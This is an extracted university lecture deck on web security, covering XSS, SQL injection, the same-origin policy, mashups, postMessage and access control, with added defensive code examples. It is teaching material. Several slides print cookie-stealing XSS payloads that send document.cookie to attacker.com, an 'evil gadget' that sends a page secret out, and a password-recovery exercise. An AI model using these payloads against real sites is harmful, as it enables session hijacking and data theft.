Web Programming and Security Lecture 2 Tamara Rezk


Security problems

Confidentiality violation

Integrity violation

Availability violation

Attacks, summary

• Phishing attacks (eg MySpace, 2006)
• Session integrity attacks (eg Dansie shopping cart, 2006)
• Cross site request forgery attacks (eg Gmail, 2007)

Prevention

• Server side:
  – add a secret that the attacker cannot guess
  – re-authenticate for critical operations

• User side:
  – logging off one site before using others

Attacks, summary

• Phishing attacks (eg MySpace, 2006)
• Session integrity attacks (eg Dansie shopping cart, 2006)
• Cross site request forgery attacks (eg Gmail, 2007)
• Navigation policy based attacks (eg Guninski/Citibank, 1999)

Attacks, classification?

Lessons Learned

Do not trust the client on:

• Maintaining integrity of sessions state

• Running client code

• Providing valid input

Lessons Learned

Do not trust the client on: providing valid input

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class Greeting extends HttpServlet {
  public void doGet(HttpServletRequest req, HttpServletResponse res)
      throws ServletException, IOException {
    res.setContentType("text/html");
    PrintWriter out = res.getWriter();
    String name = req.getParameter("name");        // untrusted client input
    out.println("<HTML>\n<BODY>\n");
    out.println("Greeting from " + name + "\n");   // echoed back without escaping
    out.println("</BODY>\n</HTML>\n");
  }
}

Lessons Learned

Do not trust the client

http://host/Greeting?name=<script> …</script>

Security in Web Applications

Main source of vulnerabilities

From Cenzic Web Security Trends Report Q1-Q2-2010

• Cross-site scripting

• Information leakage

• SQL Injection

The multitier nature of web applications causes problems

Code injection

• Data-tier code injection (SQL)

• Client-tier code injection (Javascript)

• Server-tier code injection

SQL Injection

Query = "SELECT score FROM Student where name = '" + input

SQL Code Injection Attack, Microsoft 2008

CardSystems out of business, 2005 (SQL Code injection attack)

263000 numbers stolen!

s(i1, …, in) = c

s server program

i1, … , in untrusted input (provided by client)

c client code: HTML document with Javascript nodes

Dynamic Code Generation

let’s see a guestbook example

Attack to the guestbook

<script> alert(“attack!”);</script>

Embedding Javascript

• External Javascript file:
  <body> ... <script type="text/javascript" src="myCode.js"></script>

• Inline code:
  <script type="text/javascript"> //<![CDATA[ alert("Page is loading"); //]]> </script>

• Event handler:
  <p onclick="alert('I told you not to click on me!');"> Please do not click on this text.</p> ...</body>

Let’s see some other ways to inject code

Code Injection, other example

• Untrusted client input:
  <script>window.location = "http://attacker.com?cookie=" + document.cookie;</script>

• Goal: inject the code to a benign user;

• Consequence:
  – Cookie stolen by attacker.com;
  – Possible sensitive private information;

Code Injection & XSS - Example

[Figure: sequence diagram with a Database, the Guestbook server, a Benign user, a Malicious user and Attacker.com]

1. Malicious user → Guestbook server, add entry:
   <script>window.location = "http://attacker.com?cookie=" + document.cookie;</script>
2. The entry is stored in the database unchanged.
3. Benign user → Guestbook server: get all entries
4. The page returned to the benign user contains the stored script:
   <script>window.location = "http://attacker.com?cookie=" + document.cookie;</script>
5. The benign user's browser runs it and the secret cookies go to attacker.com.

Existing Server-side Prevention

• Escaping / Filtering: vulnerable code → patched code. Programmer attention required!!
  Example: preg_replace("script", "", input) turns "<scrscriptipt>" into "<script>"

• Taint analysis: WebSSARI, Huang et al. [2004]; Pixy, Jovanovic et al. [2006]; Xie and Aiken [2006]; …

• String analysis: Minamide [2005]; Balzarotti [2008]; Wassermann et al. [2008]; …

• Instruction randomization: randomized code; Boyd et al. [2004]
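As an added example, not from the lecture, the following Node.js code contrasts the blacklist filter of the preg_replace slide with output escaping, applied to the output of the Greeting servlet shown earlier. The helper names are mine; the "<scrscriptipt>" input is the slide's own, and the tag check at the end is a deliberately crude stand-in for a browser parser.

```javascript
// Added example (not from the lecture): escaping vs. filtering.

// Escaping: every character that can open or close HTML syntax becomes an
// entity, so whatever the client sent is displayed as text, never parsed.
function escapeHtml(s) {
  const table = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => table[c]);
}

// The slide's filter: delete the word "script" (like preg_replace), one pass.
// Removing a substring can assemble a new occurrence out of the remaining pieces.
function stripScriptNonRecursive(input) {
  return input.replace(/script/gi, "");
}

// The Greeting servlet's rendering: raw concatenation of the name parameter.
function greetRaw(name) {
  return "<HTML>\n<BODY>\nGreeting from " + name + "\n</BODY>\n</HTML>\n";
}

// Same page with the untrusted value escaped at the point of output.
function greetEscaped(name) {
  return "<HTML>\n<BODY>\nGreeting from " + escapeHtml(name) + "\n</BODY>\n</HTML>\n";
}

// Crude check for the demo: does the page contain an opening script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

The filter fails because it reasons about the input, which the attacker controls; escaping reasons about the output context (HTML text), which the programmer controls, so there is nothing for the attacker to reassemble.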

HTML parser and browser quirks

• Standard HTML Parser
  – Obtain target syntax tree
  – No ill-formed result produced

• Various ways of triggering the JS engine (BEEP [Jim et al. 2007])
  – Event listener: (<DIV> :onclick "alert(msg)")
  – Hyperlink: (<A> :href "javascript:alert(msg)")
  – Dynamic code evaluation: eval, document.write

• Solution: turning off all these features in Hop
  – Advantage of multitier language

NOT identified by syntax difference

Code Injection Attack vectors

Web 2.0 Applications

2004: AJAX (Asynchronous Javascript and XML) becomes popular, social sites emerge

Technologies: Web Browser, Web Server, HTTP, HTML
CGI: Common Gateway Interface
AJAX: Javascript, CSS, XML, DOM, XMLHttpRequest

[Figure: the browser requests a service; the page is partially reloaded (iframe); an XMLHttpRequest object is used for asynchronous communication]

Mashups: HousingMaps, 2005

Web Mashup

• Web application (client side):
• Integrating third-party gadget;
• Integrator partially sharing information to gadget;
• Example: Housingmap.com

[Figure: the Google Maps gadget and the integrator's housing data combined in one page]

Great way to use your data!

Le Monde is a mashup

Code of Le Monde

<iframe src="http://www.youtube.com/embed/W8WP2SjsZw4?rel=0" width="520" height="294" frameborder="0"></iframe>

ALL OR NOTHING TRUST MODEL IN THE BROWSER

The Same Origin Policy

Programming Model – Dilemma

• Full sharing (JS Env.): running as integrator; gadget trusted. Using the <script> tag
• Full isolation (by SOP): running as gadget; limited sharing. Using the <iframe> frame
  – Frame identifier
  – PostMessage

[Figure: with <script>, the Google Maps gadget and the integrator's housing data share one environment; with <iframe>, the two are separated (X)]

The same origin policy (SOP)

• The <iframe> tag: what about Javascript behaviour?

[Figure: in the browser heap, the integrator's code and the frame loaded with <iframe src="http://b.com/gadget.js">…</iframe> each have their own global object]

• The <script> tag permits to treat code as code from the same origin

The same origin policy (SOP)

[Figure: the integrator's code, served by server a.com, includes <script src="http://b.com/gadget.js">; the browser fetches the script from server b.com]

The same origin policy (SOP)

• The <script> tag: what about Javascript behaviour?

[Figure: the browser running the integrator's code with <script src="http://b.com/gadget.js">]

The same origin policy (SOP)

An evil gadget

integrator.html:
<script src="http://attacker.com/gadget.js"></script>
<div id=secret>42</div>

gadget.js (an external JavaScript file, so no <script> tags inside it):
secret = document.getElementById("secret").innerHTML;
setTimeout('delayer()', 5000);
delayer = function () { window.location = "EvilSite.php?secret=" + secret; };

Important JavaScript detail: o.f is treated as o["f"]

Javascript

Thanks Shriram Krishnamurthi for this slide

lookup = function (o, fd) {
  if (fd === "XHR") { return "unsafe!"; }
  else { return o[fd]; }
}

If fd is not a string, JavaScript invokes the .toString method to convert the value to a string

Is this function safe?

badObj = { toString: function () { return "XHR" } }

lookup(window, badObj)
  → window[badObj]
  → window[{toString: …}]
  → window[{toString: …}.toString()]
  → window[(function () …)()]
  → window["XHR"]

…in fact, lookup is unsafe!
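The lookup function from the slide next to a version that is not fooled by a custom toString, as an added example that is not part of the lecture. The `fakeWindow` object is a constructed stand-in for the browser's global object so the code runs in Node.js; the property names in it are made up.

```javascript
// Added example (not from the lecture): implicit toString in property lookup.

// The slide's function: the guard compares the raw value, but o[fd] coerces
// it with fd.toString(), so the value checked and the key used can differ.
function lookupUnsafe(o, fd) {
  if (fd === "XHR") { return "unsafe!"; }
  return o[fd];
}

// Fixed: only accept real strings, so no object-supplied conversion runs
// between the check and the use.
function lookupSafe(o, fd) {
  if (typeof fd !== "string") { return "rejected: key must be a string"; }
  if (fd === "XHR") { return "unsafe!"; }
  return o[fd];
}

// Constructed stand-in for the global object (names are invented).
const fakeWindow = { XHR: "the XMLHttpRequest constructor", title: "page" };

// The slide's badObj: converts to "XHR" only when JavaScript asks for a string.
const badObj = { toString: function () { return "XHR"; } };
```

An equivalent fix is to coerce once up front (`const key = String(fd)`) and both check and index with `key`; the point is that the guarded value and the used value must be the same value. Note that `typeof` also rejects `new String("XHR")` and objects using `Symbol.toPrimitive`, which go through the same implicit conversion.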

More evals: e.g., setTimeout:

function f() { alert('hello'); }
setTimeout(f, 1000);

var s = "alert('hello') ";
setTimeout(s, 1000);

Any JavaScript string!

Let's try some more code with setTimeout

<script>
  s = "alert('Lets talk about Javascript!')";
  setTimeout(s, 100)
</script>

<script>
  function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); }
  r = fac(3);
  s = "alert(" + r + ")"
  setTimeout(s, 100)
</script>

What happens now?

<script src=attacker.js></script>
</head>
<body>
<script>
  function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); }
  r = fac(4);
  s = "alert(" + r + ")"
  setTimeout(s, 100)
</script>

Anything Else?

• Wrap DOM nodes and callbacks
• Don't hand references to DOM nodes to the wrong functions
• Avoid other conditionally unsafe calls
• Be aware of implicit method calls in JavaScript's semantics
• Simulate private fields (JavaScript provides none)
• Disallow arbitrary traversal of the object graph
• Avoid leaking the global object

Make sure all invariants hold over 50+ entry points

Thank you Shriram Krishnamurthi for all the recommendations! Check ADsafety


Frame Communication

Fragment Identifier Messaging

• Send information by navigating a frame
  – http://gadget.com/#hello

• Navigating to fragment doesn't reload frame
  – No network traffic, but frame can read its fragment

• Not a secure channel
  – Confidentiality
  – Integrity
  – Authentication

An attack to the Elysee?


http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB

http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous

http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!


Let’s see a video

HTML 5

• Cross-origin client side communications

• Postmessage channel between frames

• Child policy

postMessage

• New API for inter-frame communication

• Supported in latest betas of many browsers

• Not a secure channel
  – Confidentiality
  – Integrity
  – Authentication

Reply Attack

Fix: Improve the API (Stanford)

• Let the sender specify the recipient
  – frame[0].postMessage("Hello", "http://gadget.com")
  – Can omit argument if confidentiality not required

• Adoption
  – Firefox 3
  – Internet Explorer 8
  – Safari 3.1

see Securing Frame Communication in Browsers

Security considerations postmessage

• Do not configure target origin to “*”

• Sensitive data can be leaked to unknown widgets

• Always check for sender’s origin

• Always validate data before use

• Do not consume data directly with eval() or innerHTML
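The postMessage checklist above applied on both sides of the channel, as an added example that is not from the lecture or the Stanford paper. The gadget origin, the message schema (`type`, `text`) and the `makeNode` stand-in for a DOM element are assumptions so the logic runs outside a browser; `event.origin` and `event.data` are the real fields of a browser message event.

```javascript
// Added example (not from the lecture): secure use of postMessage.

const GADGET_ORIGIN = "http://gadget.com"; // assumed origin of the gadget frame

// Sender (integrator): name the recipient origin explicitly, never "*".
// If the frame has been navigated to another origin, the browser drops the message.
function sendToGadget(frame, payload) {
  frame.postMessage(JSON.stringify(payload), GADGET_ORIGIN);
}

// Receiver: 1) check the sender's origin, 2) validate the data against the
// expected schema, 3) consume it as text (textContent), never eval/innerHTML.
function handleMessage(event, outputNode) {
  if (event.origin !== GADGET_ORIGIN) return { accepted: false, reason: "origin" };
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (e) {
    return { accepted: false, reason: "parse" };
  }
  const wellFormed = msg && typeof msg === "object" && msg.type === "greeting"
    && typeof msg.text === "string" && msg.text.length <= 200;
  if (!wellFormed) return { accepted: false, reason: "schema" };
  outputNode.textContent = msg.text; // rendered as text, markup stays inert
  return { accepted: true, reason: null };
}

// Constructed stand-in for a DOM node.
function makeNode() { return { textContent: "" }; }
```

In a page this handler is registered with `window.addEventListener("message", (e) => handleMessage(e, document.getElementById("out")))`; the origin check is what the fragment-identifier channel cannot offer, and the schema check plus `textContent` is what keeps a compromised-but-allowed sender from turning the channel into an injection vector.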

Basic definitions of security

Confidential information is stored in, or communicated through "objects" protected by access rights, typically for reading, writing, and executing.

• Confidentiality: to prevent unauthorized disclosure of data we should implement:
  – access control
  – secure information flow
  – adequate cryptography
  – secure protocols
  (to name a few)

Access Control

“Subjects” = programs (threads) or users, with security clearances (read/write/execute).

“Objects” = where information is stored. For instance memory locations, files, entries in a database, services, communication channels … with access rights.

Access control = the operations performed by the “subjects” over the “objects” are checked to have the appropriate clearance.

Access Control (for integrity)

A simple example in hop: A Guest Book Application

Objects = “services”

Subjects = “users calling the services” (authentication)

Access Policy = “which user can call which service”

Services                        Users
addentry                        anonymous
addentry, delete-all-entries    admin
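The guest-book access policy above enforced at a single choke point, as an added example that is not the Hop application's own code. The service bodies are constructed stand-ins; the user name is assumed to come from authentication that has already happened.

```javascript
// Added example (not from the lecture): access control for integrity.
// Objects = services, Subjects = authenticated users, Policy = the table above.

// Maps rather than plain objects: a lookup of "constructor" or "__proto__"
// must not walk up the prototype chain and find something unexpected.
const POLICY = new Map([
  ["addentry", new Set(["anonymous", "admin"])],
  ["delete-all-entries", new Set(["admin"])],
]);

// Deny by default: a service missing from the policy is not callable.
function isAllowed(user, service) {
  const allowed = POLICY.get(service);
  return allowed !== undefined && allowed.has(user);
}

// Constructed stand-ins for the services (the real ones live in Hop).
const entries = [];
const services = new Map([
  ["addentry", (text) => { entries.push(String(text)); return entries.length; }],
  ["delete-all-entries", () => { entries.length = 0; return 0; }],
]);

// Every call goes through here, so the check cannot be skipped per service.
function callService(user, service, ...args) {
  if (!isAllowed(user, service)) return { ok: false, error: "forbidden" };
  return { ok: true, result: services.get(service)(...args) };
}
```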

Access Control (for confidentiality)

A simple example in hop: A Broker Application

Objects = “services” showStockInfo

Subjects = “users calling the services” (authentication)

Access Policy = “No user should learn anything about stocks of other users” (each user can see only his/her confidential information on stocks)

Access control

• In Hop: wizard.hop

AUTHENTICATION PROTOCOLS

Http authentication is not really secure!!

Let's play attacker again on an example with "Tamper Data" and a Base64 Decoder to obtain the password of the admin user.

SSL/TLS AUTHENTICATION

INFORMATION FLOW IN THE PROGRAM

Broker Application

(define (isUser t a) (string=? t (car a)))

(define-service (show-all-entry)
  … (map show-entry
         (filter (lambda (a) (isUser username a)) broker-private-information)))

(define-service (broker)
  (<HTML> (<BODY> …
    (<BUTTON> :onclick ~(with-hop ($show-all-entry) …) "Share holder login") …)))

Broker Application

(define (isUser1 t a) (string-contains t (car a)))

(define-service (show-all-entry)
  … (map show-entry
         (filter (lambda (a) (isUser1 username a)) broker-private-information)))

(define-service (broker)
  (<HTML> (<BODY> …
    (<BUTTON> :onclick ~(with-hop ($show-all-entry) …) "Share holder login") …)))
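The two broker predicates, isUser and isUser1, rewritten in JavaScript so the information-flow difference can be tested, as an added example that is not the Hop application's code. The contents of broker-private-information are constructed; Hop's (string-contains t s) is taken to mean "s occurs inside t", which is what `t.includes(s)` checks.

```javascript
// Added example (not from the lecture): why isUser1 leaks other users' stocks.

// Constructed sample of broker-private-information: [owner, stock record].
const brokerPrivateInformation = [
  ["bob", "ACME: 100 shares"],
  ["bobby", "ACME: 5 shares"],
  ["alice", "XYZ: 40 shares"],
];

// (define (isUser t a) (string=? t (car a))): exact match on the owner name.
function isUser(t, a) { return t === a[0]; }

// (define (isUser1 t a) (string-contains t (car a))): true whenever the
// owner's name appears anywhere inside the requesting user's name.
function isUser1(t, a) { return t.includes(a[0]); }

// show-all-entry: records the predicate lets through for this user.
function showAllEntries(username, pred) {
  return brokerPrivateInformation
    .filter((a) => pred(username, a))
    .map((a) => a[1]);
}

// The confidentiality policy from the slide, stated as a check: does the
// predicate ever let a user see a record owned by someone else?
function violatesPolicy(username, pred) {
  return brokerPrivateInformation.some((a) => a[0] !== username && pred(username, a));
}
```

With isUser1, the user "bobby" receives bob's record as well as his own: nothing in the access control of the service changed, the leak is entirely in how the program lets data flow from broker-private-information to the response, which is the distinction between access control and secure information flow that the lecture draws.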

Availability security problems

• A service or resource is made unavailable

Common attack: DOS or Distributed DOS (DDOS)

How to prevent it?

Attacks, summary

• Phishing attacks (eg MySpace, 2006)
• Session integrity attacks (eg Dansie shopping cart, 2006)
• Cross site request forgery attacks (eg Gmail, 2007)
• Navigation policy based attacks (eg Guninski/Citibank, 1999)
• Code injection attacks (eg Microsoft, 2008)
• XSS attacks
• Mashup based attacks
• http authentication attacks
• DOS attacks (Captchas)

Context – Multi-tier Language

• Unified Language
• Code split to different tiers
• Example:
  – LINKS [Cooper et al. 2005]
  – Swift [Chong et al. 2007]
  – Ur [Chlipala 2010]
  – HOP [Serrano et al. 2006]
• This course focus: HOP

Hop compilation

[Figure: the multi-tier compiler splits a Hop program into server code and client code. The server code compiler produces server bytecode; the client code compiler generates HTML, CSS and JS. Over HTTP the client accesses URLs and invokes services, and the server generates the client code.]

[Figure: Code Injection Prevention with the Mashic compiler; URLs]